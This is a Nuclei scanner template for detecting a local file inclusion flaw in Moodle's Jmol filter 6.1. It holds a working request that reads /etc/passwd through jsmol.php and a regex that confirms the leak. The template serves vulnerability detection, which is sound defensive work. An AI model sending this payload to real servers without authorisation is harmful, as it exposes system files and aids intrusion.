id: moodle-filter-jmol-lfi

info:
  name: Moodle Jmol Filter 6.1 - Local File Inclusion
  author: madrobot
  severity: high
  description: Moodle is vulnerable to local file inclusion.
  reference:
    - https://www.exploit-db.com/exploits/46881
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:F/RL:W/RC:C
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: moodle,lfi,edb

requests:
  - method: GET
    path:
      - "{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body

# Enhanced by mp on 2022/07/22
